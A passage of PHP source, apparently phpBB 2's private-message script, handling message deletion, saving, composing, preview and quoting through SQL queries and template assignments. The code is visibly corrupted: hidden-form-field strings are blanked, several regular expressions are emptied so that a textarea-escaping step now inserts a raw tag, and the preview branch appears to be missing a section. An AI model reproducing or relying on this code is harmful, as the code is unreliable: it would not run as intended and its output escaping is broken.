', $private_message); // // Dump it to the templating engine // $template->assign_vars(array( 'MESSAGE_TO' => $username_to, 'MESSAGE_FROM' => $username_from, 'RANK_IMAGE' => $rank_image, 'POSTER_JOINED' => $poster_joined, 'POSTER_POSTS' => $poster_posts, 'POSTER_FROM' => $poster_from, 'POSTER_AVATAR' => $poster_avatar, 'POST_SUBJECT' => $post_subject, 'POST_DATE' => $post_date, 'MESSAGE' => $private_message, 'PROFILE_IMG' => $profile_img, 'PROFILE' => $profile, 'SEARCH_IMG' => $search_img, 'SEARCH' => $search, 'EMAIL_IMG' => $email_img, 'EMAIL' => $email, 'WWW_IMG' => $www_img, 'WWW' => $www, 'ICQ_STATUS_IMG' => $icq_status_img, 'ICQ_IMG' => $icq_img, 'ICQ' => $icq, 'AIM_IMG' => $aim_img, 'AIM' => $aim, 'MSN_IMG' => $msn_img, 'MSN' => $msn, 'YIM_IMG' => $yim_img, 'YIM' => $yim) ); $template->pparse('body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); } else if ( ( $delete && $mark_list ) || $delete_all ) { if ( !$userdata['session_logged_in'] ) { redirect(append_sid("login.$phpEx?redirect=privmsg.$phpEx&folder=inbox", true)); } if ( isset($mark_list) && !is_array($mark_list) ) { // Set to empty array instead of '0' if nothing is selected. $mark_list = array(); } if ( !$confirm ) { $s_hidden_fields = ''; $s_hidden_fields .= ( isset($HTTP_POST_VARS['delete']) ) ? '' : ''; for($i = 0; $i < count($mark_list); $i++) { $s_hidden_fields .= ''; } // // Output confirmation page // include($phpbb_root_path . 'includes/page_header.'.$phpEx); $template->set_filenames(array( 'confirm_body' => 'confirm_body.tpl') ); $template->assign_vars(array( 'MESSAGE_TITLE' => $lang['Information'], 'MESSAGE_TEXT' => ( count($mark_list) == 1 ) ? $lang['Confirm_delete_pm'] : $lang['Confirm_delete_pms'], 'L_YES' => $lang['Yes'], 'L_NO' => $lang['No'], 'S_CONFIRM_ACTION' => append_sid("privmsg.$phpEx?folder=$folder"), 'S_HIDDEN_FIELDS' => $s_hidden_fields) ); $template->pparse('confirm_body'); include($phpbb_root_path . 'includes/page_tail.'.$phpEx); } else if ( $confirm ) { $delete_sql_id = ''; if (!$delete_all) { for ($i = 0; $i < count($mark_list); $i++) { $delete_sql_id .= (($delete_sql_id != '') ? ', ' : '') . intval($mark_list[$i]); } $delete_sql_id = "AND privmsgs_id IN ($delete_sql_id)"; } switch($folder) { case 'inbox': $delete_type = "privmsgs_to_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'outbox': $delete_type = "privmsgs_from_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'sentbox': $delete_type = "privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SENT_MAIL; break; case 'savebox': $delete_type = "( ( privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) OR ( privmsgs_to_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) )"; break; } $sql = "SELECT privmsgs_id FROM " . PRIVMSGS_TABLE . " WHERE $delete_type $delete_sql_id"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain id list to delete messages', '', __LINE__, __FILE__, $sql); } $mark_list = array(); while ( $row = $db->sql_fetchrow($result) ) { $mark_list[] = $row['privmsgs_id']; } unset($delete_type); if ( count($mark_list) ) { $delete_sql_id = ''; for ($i = 0; $i < sizeof($mark_list); $i++) { $delete_sql_id .= (($delete_sql_id != '') ? ', ' : '') . intval($mark_list[$i]); } if ($folder == 'inbox' || $folder == 'outbox') { switch ($folder) { case 'inbox': $sql = "privmsgs_to_userid = " . $userdata['user_id']; break; case 'outbox': $sql = "privmsgs_from_userid = " . $userdata['user_id']; break; } // Get information relevant to new or unread mail // so we can adjust users counters appropriately $sql = "SELECT privmsgs_to_userid, privmsgs_type FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id IN ($delete_sql_id) AND $sql AND privmsgs_type IN (" . PRIVMSGS_NEW_MAIL . ", " . PRIVMSGS_UNREAD_MAIL . ")"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain user id list for outbox messages', '', __LINE__, __FILE__, $sql); } if ( $row = $db->sql_fetchrow($result)) { $update_users = $update_list = array(); do { switch ($row['privmsgs_type']) { case PRIVMSGS_NEW_MAIL: $update_users['new'][$row['privmsgs_to_userid']]++; break; case PRIVMSGS_UNREAD_MAIL: $update_users['unread'][$row['privmsgs_to_userid']]++; break; } } while ($row = $db->sql_fetchrow($result)); if (sizeof($update_users)) { while (list($type, $users) = each($update_users)) { while (list($user_id, $dec) = each($users)) { $update_list[$type][$dec][] = $user_id; } } unset($update_users); while (list($type, $dec_ary) = each($update_list)) { switch ($type) { case 'new': $type = "user_new_privmsg"; break; case 'unread': $type = "user_unread_privmsg"; break; } while (list($dec, $user_ary) = each($dec_ary)) { $user_ids = implode(', ', $user_ary); $sql = "UPDATE " . USERS_TABLE . " SET $type = $type - $dec WHERE user_id IN ($user_ids)"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update user pm counters', '', __LINE__, __FILE__, $sql); } } } unset($update_list); } } $db->sql_freeresult($result); } // Delete the messages $delete_text_sql = "DELETE FROM " . PRIVMSGS_TEXT_TABLE . " WHERE privmsgs_text_id IN ($delete_sql_id)"; $delete_sql = "DELETE FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id IN ($delete_sql_id) AND "; switch( $folder ) { case 'inbox': $delete_sql .= "privmsgs_to_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'outbox': $delete_sql .= "privmsgs_from_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )"; break; case 'sentbox': $delete_sql .= "privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SENT_MAIL; break; case 'savebox': $delete_sql .= "( ( privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) OR ( privmsgs_to_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) )"; break; } if ( !$db->sql_query($delete_sql, BEGIN_TRANSACTION) ) { message_die(GENERAL_ERROR, 'Could not delete private message info', '', __LINE__, __FILE__, $delete_sql); } if ( !$db->sql_query($delete_text_sql, END_TRANSACTION) ) { message_die(GENERAL_ERROR, 'Could not delete private message text', '', __LINE__, __FILE__, $delete_text_sql); } } } } else if ( $save && $mark_list && $folder != 'savebox' && $folder != 'outbox' ) { if ( !$userdata['session_logged_in'] ) { redirect(append_sid("login.$phpEx?redirect=privmsg.$phpEx&folder=inbox", true)); } if (sizeof($mark_list)) { // See if recipient is at their savebox limit $sql = "SELECT COUNT(privmsgs_id) AS savebox_items, MIN(privmsgs_date) AS oldest_post_time FROM " . PRIVMSGS_TABLE . " WHERE ( ( privmsgs_to_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . ") )"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain sent message info for sendee', '', __LINE__, __FILE__, $sql); } $sql_priority = ( SQL_LAYER == 'mysql' ) ? 'LOW_PRIORITY' : ''; if ( $saved_info = $db->sql_fetchrow($result) ) { if ($board_config['max_savebox_privmsgs'] && $saved_info['savebox_items'] >= $board_config['max_savebox_privmsgs'] ) { $sql = "SELECT privmsgs_id FROM " . PRIVMSGS_TABLE . " WHERE ( ( privmsgs_to_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . ") ) AND privmsgs_date = " . $saved_info['oldest_post_time']; if ( !$result = $db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not find oldest privmsgs (save)', '', __LINE__, __FILE__, $sql); } $old_privmsgs_id = $db->sql_fetchrow($result); $old_privmsgs_id = $old_privmsgs_id['privmsgs_id']; $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs (save)', '', __LINE__, __FILE__, $sql); } $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TEXT_TABLE . " WHERE privmsgs_text_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs text (save)', '', __LINE__, __FILE__, $sql); } } } $saved_sql_id = ''; for ($i = 0; $i < sizeof($mark_list); $i++) { $saved_sql_id .= (($saved_sql_id != '') ? ', ' : '') . intval($mark_list[$i]); } // Process request $saved_sql = "UPDATE " . PRIVMSGS_TABLE; // Decrement read/new counters if appropriate if ($folder == 'inbox' || $folder == 'outbox') { switch ($folder) { case 'inbox': $sql = "privmsgs_to_userid = " . $userdata['user_id']; break; case 'outbox': $sql = "privmsgs_from_userid = " . $userdata['user_id']; break; } // Get information relevant to new or unread mail // so we can adjust users counters appropriately $sql = "SELECT privmsgs_to_userid, privmsgs_type FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id IN ($saved_sql_id) AND $sql AND privmsgs_type IN (" . PRIVMSGS_NEW_MAIL . ", " . PRIVMSGS_UNREAD_MAIL . ")"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain user id list for outbox messages', '', __LINE__, __FILE__, $sql); } if ( $row = $db->sql_fetchrow($result)) { $update_users = $update_list = array(); do { switch ($row['privmsgs_type']) { case PRIVMSGS_NEW_MAIL: $update_users['new'][$row['privmsgs_to_userid']]++; break; case PRIVMSGS_UNREAD_MAIL: $update_users['unread'][$row['privmsgs_to_userid']]++; break; } } while ($row = $db->sql_fetchrow($result)); if (sizeof($update_users)) { while (list($type, $users) = each($update_users)) { while (list($user_id, $dec) = each($users)) { $update_list[$type][$dec][] = $user_id; } } unset($update_users); while (list($type, $dec_ary) = each($update_list)) { switch ($type) { case 'new': $type = "user_new_privmsg"; break; case 'unread': $type = "user_unread_privmsg"; break; } while (list($dec, $user_ary) = each($dec_ary)) { $user_ids = implode(', ', $user_ary); $sql = "UPDATE " . USERS_TABLE . " SET $type = $type - $dec WHERE user_id IN ($user_ids)"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update user pm counters', '', __LINE__, __FILE__, $sql); } } } unset($update_list); } } $db->sql_freeresult($result); } switch ($folder) { case 'inbox': $saved_sql .= " SET privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " WHERE privmsgs_to_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . ")"; break; case 'outbox': $saved_sql .= " SET privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " WHERE privmsgs_from_userid = " . $userdata['user_id'] . " AND ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) "; break; case 'sentbox': $saved_sql .= " SET privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " WHERE privmsgs_from_userid = " . $userdata['user_id'] . " AND privmsgs_type = " . PRIVMSGS_SENT_MAIL; break; } $saved_sql .= " AND privmsgs_id IN ($saved_sql_id)"; if ( !$db->sql_query($saved_sql) ) { message_die(GENERAL_ERROR, 'Could not save private messages', '', __LINE__, __FILE__, $saved_sql); } redirect(append_sid("privmsg.$phpEx?folder=savebox", true)); } } else if ( $submit || $refresh || $mode != '' ) { if ( !$userdata['session_logged_in'] ) { $user_id = ( isset($HTTP_GET_VARS[POST_USERS_URL]) ) ? '&' . POST_USERS_URL . '=' . intval($HTTP_GET_VARS[POST_USERS_URL]) : ''; redirect(append_sid("login.$phpEx?redirect=privmsg.$phpEx&folder=$folder&mode=$mode" . $user_id, true)); } // // Toggles // if ( !$board_config['allow_html'] ) { $html_on = 0; } else { $html_on = ( $submit || $refresh ) ? ( ( !empty($HTTP_POST_VARS['disable_html']) ) ? 0 : TRUE ) : $userdata['user_allowhtml']; } if ( !$board_config['allow_bbcode'] ) { $bbcode_on = 0; } else { $bbcode_on = ( $submit || $refresh ) ? ( ( !empty($HTTP_POST_VARS['disable_bbcode']) ) ? 0 : TRUE ) : $userdata['user_allowbbcode']; } if ( !$board_config['allow_smilies'] ) { $smilies_on = 0; } else { $smilies_on = ( $submit || $refresh ) ? ( ( !empty($HTTP_POST_VARS['disable_smilies']) ) ? 0 : TRUE ) : $userdata['user_allowsmile']; } $attach_sig = ( $submit || $refresh ) ? ( ( !empty($HTTP_POST_VARS['attach_sig']) ) ? TRUE : 0 ) : $userdata['user_attachsig']; $user_sig = ( $userdata['user_sig'] != '' && $board_config['allow_sig'] ) ? $userdata['user_sig'] : ""; if ( $submit && $mode != 'edit' ) { // // Flood control // $sql = "SELECT MAX(privmsgs_date) AS last_post_time FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_from_userid = " . $userdata['user_id']; if ( $result = $db->sql_query($sql) ) { $db_row = $db->sql_fetchrow($result); $last_post_time = $db_row['last_post_time']; $current_time = time(); if ( ( $current_time - $last_post_time ) < $board_config['flood_interval']) { message_die(GENERAL_MESSAGE, $lang['Flood_Error']); } } // // End Flood control // } if ($submit && $mode == 'edit') { $sql = 'SELECT privmsgs_from_userid FROM ' . PRIVMSGS_TABLE . ' WHERE privmsgs_id = ' . (int) $privmsg_id . ' AND privmsgs_from_userid = ' . $userdata['user_id']; if (!($result = $db->sql_query($sql))) { message_die(GENERAL_ERROR, "Could not obtain message details", "", __LINE__, __FILE__, $sql); } if (!($row = $db->sql_fetchrow($result))) { message_die(GENERAL_MESSAGE, $lang['No_such_post']); } $db->sql_freeresult($result); unset($row); } if ( $submit ) { if ( !empty($HTTP_POST_VARS['username']) ) { $to_username = phpbb_clean_username($HTTP_POST_VARS['username']); $sql = "SELECT user_id, user_notify_pm, user_email, user_lang, user_active FROM " . USERS_TABLE . " WHERE username = '" . str_replace("\'", "''", $to_username) . "' AND user_id <> " . ANONYMOUS; if ( !($result = $db->sql_query($sql)) ) { $error = TRUE; $error_msg = $lang['No_such_user']; } if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; } } else { $error = TRUE; $error_msg .= ( ( !empty($error_msg) ) ? '
' : '' ) . $lang['No_to_user']; } $privmsg_subject = trim(htmlspecialchars($HTTP_POST_VARS['subject'])); if ( empty($privmsg_subject) ) { $error = TRUE; $error_msg .= ( ( !empty($error_msg) ) ? '
' : '' ) . $lang['Empty_subject']; } if ( !empty($HTTP_POST_VARS['message']) ) { if ( !$error ) { if ( $bbcode_on ) { $bbcode_uid = make_bbcode_uid(); } $privmsg_message = prepare_message($HTTP_POST_VARS['message'], $html_on, $bbcode_on, $smilies_on, $bbcode_uid); } } else { $error = TRUE; $error_msg .= ( ( !empty($error_msg) ) ? '
' : '' ) . $lang['Empty_message']; } } if ( $submit && !$error ) { // // Has admin prevented user from sending PM's? // if ( !$userdata['user_allow_pm'] ) { $message = $lang['Cannot_send_privmsg']; message_die(GENERAL_MESSAGE, $message); } $msg_time = time(); if ( $mode != 'edit' ) { // // See if recipient is at their inbox limit // $sql = "SELECT COUNT(privmsgs_id) AS inbox_items, MIN(privmsgs_date) AS oldest_post_time FROM " . PRIVMSGS_TABLE . " WHERE ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) AND privmsgs_to_userid = " . $to_userdata['user_id']; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_MESSAGE, $lang['No_such_user']); } $sql_priority = ( SQL_LAYER == 'mysql' ) ? 'LOW_PRIORITY' : ''; if ( $inbox_info = $db->sql_fetchrow($result) ) { if ($board_config['max_inbox_privmsgs'] && $inbox_info['inbox_items'] >= $board_config['max_inbox_privmsgs']) { $sql = "SELECT privmsgs_id FROM " . PRIVMSGS_TABLE . " WHERE ( privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) AND privmsgs_date = " . $inbox_info['oldest_post_time'] . " AND privmsgs_to_userid = " . $to_userdata['user_id']; if ( !$result = $db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not find oldest privmsgs (inbox)', '', __LINE__, __FILE__, $sql); } $old_privmsgs_id = $db->sql_fetchrow($result); $old_privmsgs_id = $old_privmsgs_id['privmsgs_id']; $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TABLE . " WHERE privmsgs_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs (inbox)'.$sql, '', __LINE__, __FILE__, $sql); } $sql = "DELETE $sql_priority FROM " . PRIVMSGS_TEXT_TABLE . " WHERE privmsgs_text_id = $old_privmsgs_id"; if ( !$db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not delete oldest privmsgs text (inbox)', '', __LINE__, __FILE__, $sql); } } } $sql_info = "INSERT INTO " . PRIVMSGS_TABLE . " (privmsgs_type, privmsgs_subject, privmsgs_from_userid, privmsgs_to_userid, privmsgs_date, privmsgs_ip, privmsgs_enable_html, privmsgs_enable_bbcode, privmsgs_enable_smilies, privmsgs_attach_sig) VALUES (" . PRIVMSGS_NEW_MAIL . ", '" . str_replace("\'", "''", $privmsg_subject) . "', " . $userdata['user_id'] . ", " . $to_userdata['user_id'] . ", $msg_time, '$user_ip', $html_on, $bbcode_on, $smilies_on, $attach_sig)"; } else { $sql_info = "UPDATE " . PRIVMSGS_TABLE . " SET privmsgs_type = " . PRIVMSGS_NEW_MAIL . ", privmsgs_subject = '" . str_replace("\'", "''", $privmsg_subject) . "', privmsgs_from_userid = " . $userdata['user_id'] . ", privmsgs_to_userid = " . $to_userdata['user_id'] . ", privmsgs_date = $msg_time, privmsgs_ip = '$user_ip', privmsgs_enable_html = $html_on, privmsgs_enable_bbcode = $bbcode_on, privmsgs_enable_smilies = $smilies_on, privmsgs_attach_sig = $attach_sig WHERE privmsgs_id = $privmsg_id"; } if ( !($result = $db->sql_query($sql_info, BEGIN_TRANSACTION)) ) { message_die(GENERAL_ERROR, "Could not insert/update private message sent info.", "", __LINE__, __FILE__, $sql_info); } if ( $mode != 'edit' ) { $privmsg_sent_id = $db->sql_nextid(); $sql = "INSERT INTO " . PRIVMSGS_TEXT_TABLE . " (privmsgs_text_id, privmsgs_bbcode_uid, privmsgs_text) VALUES ($privmsg_sent_id, '" . $bbcode_uid . "', '" . str_replace("\'", "''", $privmsg_message) . "')"; } else { $sql = "UPDATE " . PRIVMSGS_TEXT_TABLE . " SET privmsgs_text = '" . str_replace("\'", "''", $privmsg_message) . "', privmsgs_bbcode_uid = '$bbcode_uid' WHERE privmsgs_text_id = $privmsg_id"; } if ( !$db->sql_query($sql, END_TRANSACTION) ) { message_die(GENERAL_ERROR, "Could not insert/update private message sent text.", "", __LINE__, __FILE__, $sql); } if ( $mode != 'edit' ) { // // Add to the users new pm counter // $sql = "UPDATE " . USERS_TABLE . " SET user_new_privmsg = user_new_privmsg + 1, user_last_privmsg = " . time() . " WHERE user_id = " . $to_userdata['user_id']; if ( !$status = $db->sql_query($sql) ) { message_die(GENERAL_ERROR, 'Could not update private message new/read status for user', '', __LINE__, __FILE__, $sql); } if ( $to_userdata['user_notify_pm'] && !empty($to_userdata['user_email']) && $to_userdata['user_active'] ) { $script_name = preg_replace('/^\/?(.*?)\/?$/', "\\1", trim($board_config['script_path'])); $script_name = ( $script_name != '' ) ? $script_name . '/privmsg.'.$phpEx : 'privmsg.'.$phpEx; $server_name = trim($board_config['server_name']); $server_protocol = ( $board_config['cookie_secure'] ) ? 'https://' : 'http://'; $server_port = ( $board_config['server_port'] <> 80 ) ? ':' . trim($board_config['server_port']) . '/' : '/'; include($phpbb_root_path . 'includes/emailer.'.$phpEx); $emailer = new emailer($board_config['smtp_delivery']); $emailer->from($board_config['board_email']); $emailer->replyto($board_config['board_email']); $emailer->use_template('privmsg_notify', $to_userdata['user_lang']); $emailer->email_address($to_userdata['user_email']); $emailer->set_subject($lang['Notification_subject']); $emailer->assign_vars(array( 'USERNAME' => stripslashes($to_username), 'SITENAME' => $board_config['sitename'], 'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ? str_replace('
', "\n", "-- \n" . $board_config['board_email_sig']) : '', 'U_INBOX' => $server_protocol . $server_name . $server_port . $script_name . '?folder=inbox') ); $emailer->send(); $emailer->reset(); } } $template->assign_vars(array( 'META' => '') ); $msg = $lang['Message_sent'] . '

' . sprintf($lang['Click_return_inbox'], '', ' ') . '

' . sprintf($lang['Click_return_index'], '', ''); message_die(GENERAL_MESSAGE, $msg); } else if ( $preview || $refresh || $error ) { // // If we're previewing or refreshing then obtain the data // passed to the script, process it a little, do some checks // where neccessary, etc. // $to_username = (isset($HTTP_POST_VARS['username']) ) ? trim(htmlspecialchars(stripslashes($HTTP_POST_VARS['username']))) : ''; $privmsg_subject = ( isset($HTTP_POST_VARS['subject']) ) ? trim(htmlspecialchars(stripslashes($HTTP_POST_VARS['subject']))) : ''; $privmsg_message = ( isset($HTTP_POST_VARS['message']) ) ? trim($HTTP_POST_VARS['message']) : ''; $privmsg_message = preg_replace('##si', '</textarea>', $privmsg_message); $user_sig = ( $board_config['allow_sig'] ) ? (($privmsg['privmsgs_type'] == PRIVMSGS_NEW_MAIL) ? $user_sig : $privmsg['user_sig']) : ''; $to_username = $privmsg['username']; $to_userid = $privmsg['user_id']; } else if ( $mode == 'reply' || $mode == 'quote' ) { $sql = "SELECT pm.privmsgs_subject, pm.privmsgs_date, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text, u.username, u.user_id FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u WHERE pm.privmsgs_id = $privmsg_id AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND u.user_id = pm.privmsgs_from_userid"; if ( !($result = $db->sql_query($sql)) ) { message_die(GENERAL_ERROR, 'Could not obtain private message for editing', '', __LINE__, __FILE__, $sql); } if ( !($privmsg = $db->sql_fetchrow($result)) ) { redirect(append_sid("privmsg.$phpEx?folder=$folder", true)); } $orig_word = $replacement_word = array(); obtain_word_list($orig_word, $replacement_word); $privmsg_subject = ( ( !preg_match('/^Re:/', $privmsg['privmsgs_subject']) ) ? 'Re: ' : '' ) . $privmsg['privmsgs_subject']; $privmsg_subject = preg_replace($orig_word, $replacement_word, $privmsg_subject); $to_username = $privmsg['username']; $to_userid = $privmsg['user_id']; if ( $mode == 'quote' ) { $privmsg_message = $privmsg['privmsgs_text']; $privmsg_bbcode_uid = $privmsg['privmsgs_bbcode_uid']; $privmsg_message = preg_replace("/\:(([a-z0-9]:)?)$privmsg_bbcode_uid/si", '', $privmsg_message); $privmsg_message = str_replace('
', "\n", $privmsg_message); $privmsg_message = preg_replace('##si', '</textarea>', $privmsg_message); $privmsg_message = preg_replace($orig_word, $replacement_word, $privmsg_message); $msg_date = create_date($board_config['default_dateformat'], $privmsg['privmsgs_date'], $board_config['board_timezone']); $privmsg_message = '[quote="' . $to_username . '"]' . $privmsg_message . '[/quote]'; $mode = 'reply'; } } else { $privmsg_subject = $privmsg_message = $to_username = ''; } } // // Has admin prevented user from sending PM's? // if ( !$userdata['user_allow_pm'] && $mode != 'edit' ) { $message = $lang['Cannot_send_privmsg']; message_die(GENERAL_MESSAGE, $message); } // // Start output, first preview, then errors then post form // $page_title = $lang['Send_private_message']; include($phpbb_root_path . 'includes/page_header.'.$phpEx); if ( $preview && !$error ) { $orig_word = array(); $replacement_word = array(); obtain_word_list($orig_word, $replacement_word); if ( $bbcode_on ) { $bbcode_uid = make_bbcode_uid(); } $preview_message = stripslashes(prepare_message($privmsg_message, $html_on, $bbcode_on, $smilies_on, $bbcode_uid)); $privmsg_message = stripslashes(preg_replace($html_entities_match, $html_entities_replace, $privmsg_message)); // // Finalise processing as per viewtopic // if ( !$html_on || !$board_config['allow_html'] || !$userdata['user_allowhtml'] ) { if ( $user_sig != '' ) { $user_sig = preg_replace('#(<)([\/]?.*?)(>)#is', "<\\2>", $user_sig); } } if ( $attach_sig && $user_sig != '' && $userdata['user_sig_bbcode_uid'] ) { $user_sig = bbencode_second_pass($user_sig, $userdata['user_sig_bbcode_uid']); } if ( $bbcode_on ) { $preview_message = bbencode_second_pass($preview_message, $bbcode_uid); } if ( $attach_sig && $user_sig != '' ) { $preview_message = $preview_message . '

_________________
' . $user_sig; } if ( count($orig_word) ) { $preview_subject = preg_replace($orig_word, $replacement_word, $privmsg_subject); $preview_message = preg_replace($orig_word, $replacement_word, $preview_message); } else { $preview_subject = $privmsg_subject; } if ( $smilies_on ) { $preview_message = smilies_pass($preview_message); } $preview_message = make_clickable($preview_message); $preview_message = str_replace("\n", '
', $preview_message); $s_hidden_fields = ''; $s_hidden_fields .= ''; if ( isset($privmsg_id) ) { $s_hidden_fields .= ''; } $template->set_filenames(array( "preview" => 'privmsgs_preview.tpl') ); $template->assign_vars(array( 'TOPIC_TITLE' => $preview_subject, 'POST_SUBJECT' => $preview_subject, 'MESSAGE_TO' => $to_username, 'MESSAGE_FROM' => $userdata['username'], 'POST_DATE' => create_date($board_config['default_dateformat'], time(), $board_config['board_timezone']), 'MESSAGE' => $preview_message, 'S_HIDDEN_FIELDS' => $s_hidden_fields, 'L_SUBJECT' => $lang['Subject'], 'L_DATE' => $lang['Date'], 'L_FROM' => $lang['From'], 'L_TO' => $lang['To'], 'L_PREVIEW' => $lang['Preview'], 'L_POSTED' => $lang['Posted']) ); $template->assign_var_from_handle('POST_PREVIEW_BOX', 'preview'); } // // Start error handling // if ($error) { $template->set_filenames(array( 'reg_header' => 'error_body.tpl') ); $template->assign_vars(array( 'ERROR_MESSAGE' => $error_msg) ); $template->assign_var_from_handle('ERROR_BOX', 'reg_header'); } // // Load templates // $template->set_filenames(array( 'body' => 'posting_body.tpl') ); make_jumpbox('viewforum.'.$phpEx); // // Enable extensions in posting_body // $template->assign_block_vars('switch_privmsg', array()); // // HTML toggle selection // if ( $board_config['allow_html'] ) { $html_status = $lang['HTML_is_ON']; $template->assign_block_vars('switch_html_checkbox', array()); } else { $html_status = $lang['HTML_is_OFF']; } // // BBCode toggle selection // if ( $board_config['allow_bbcode'] ) { $bbcode_status = $lang['BBCode_is_ON']; $template->assign_block_vars('switch_bbcode_checkbox', array()); } else { $bbcode_status = $lang['BBCode_is_OFF']; } // // Smilies toggle selection // if ( $board_config['allow_smilies'] ) { $smilies_status = $lang['Smilies_are_ON']; $template->assign_block_vars('switch_smilies_checkbox', array()); } else { $smilies_status = $lang['Smilies_are_OFF']; } // // Signature toggle selection - only show if // the user has a signature // if ( $user_sig != '' ) { $template->assign_block_vars('switch_signature_checkbox', array()); } if ( $mode == 'post' ) { $post_a = $lang['Send_a_new_message']; } else if ( $mode == 'reply' ) { $post_a = $lang['Send_a_reply']; $mode = 'post'; } else if ( $mode == 'edit' ) { $post_a = $lang['Edit_message']; } $s_hidden_fields = ''; $s_hidden_fields .= ''; if ( $mode == 'edit' ) { $s_hidden_fields .= ''; } // // Send smilies to template // generate_smilies('inline', PAGE_PRIVMSGS); $template->assign_vars(array( 'SUBJECT' => $privmsg_subject, 'USERNAME' => $to_username, 'MESSAGE' => $privmsg_message, 'HTML_STATUS' => $html_status, 'SMILIES_STATUS' => $smilies_status, 'BBCODE_STATUS' => sprintf($bbcode_status, '', ''), 'FORUM_NAME' => $lang['Private_Message'], 'BOX_NAME' => $l_box_name, 'INBOX_IMG' => $inbox_img, 'SENTBOX_IMG' => $sentbox_img, 'OUTBOX_IMG' => $outbox_img, 'SAVEBOX_IMG' => $savebox_img, 'INBOX' => $inbox_url, 'SENTBOX' => $sentbox_url, 'OUTBOX' => $outbox_url, 'SAVEBOX' => $savebox_url, 'L_SUBJECT' => $lang['Subject'], 'L_MESSAGE_BODY' => $lang['Message_body'], 'L_OPTIONS' => $lang['Options'], 'L_SPELLCHECK' => $lang['Spellcheck'], 'L_PREVIEW' => $lang['Preview'], 'L_SUBMIT' => $lang['Submit'], 'L_CANCEL' => $lang['Cancel'], 'L_POST_A' => $post_a, 'L_FIND_USERNAME' => $lang['Find_username'], 'L_FIND' => $lang['Find'], 'L_DISABLE_HTML' => $lang['Disable_HTML_pm'], 'L_DISABLE_BBCODE' => $lang['Disable_BBCode_pm'], 'L_DISABLE_SMILIES' => 